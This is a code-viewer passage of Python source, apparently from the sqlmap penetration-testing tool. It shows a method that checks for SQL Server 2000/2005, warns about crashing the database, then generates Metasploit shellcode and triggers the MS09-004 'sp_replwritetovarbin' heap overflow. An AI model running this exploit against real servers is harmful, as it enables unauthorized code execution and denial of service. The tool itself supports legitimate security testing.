(self)
| 331 | self.smb() |
| 332 | |
| 333 | def osBof(self): |
| 334 | if not isStackingAvailable() and not conf.direct: |
| 335 | return |
| 336 | |
| 337 | if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")): |
| 338 | errMsg = "the back-end DBMS must be Microsoft SQL Server " |
| 339 | errMsg += "2000 or 2005 to be able to exploit the heap-based " |
| 340 | errMsg += "buffer overflow in the 'sp_replwritetovarbin' " |
| 341 | errMsg += "stored procedure (MS09-004)" |
| 342 | raise SqlmapUnsupportedDBMSException(errMsg) |
| 343 | |
| 344 | infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() |
| 345 | infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " |
| 346 | infoMsg += "buffer overflow (MS09-004)" |
| 347 | logger.info(infoMsg) |
| 348 | |
| 349 | msg = "this technique is likely to DoS the DBMS process, are you " |
| 350 | msg += "sure that you want to carry with the exploit? [y/N] " |
| 351 | |
| 352 | if readInput(msg, default='N', boolean=True): |
| 353 | self.initEnv(mandatory=False, detailed=True) |
| 354 | self.getRemoteTempPath() |
| 355 | self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) |
| 356 | self.bof() |
| 357 | |
| 358 | def uncPathRequest(self): |
| 359 | errMsg = "'uncPathRequest' method must be defined " |
no test coverage detected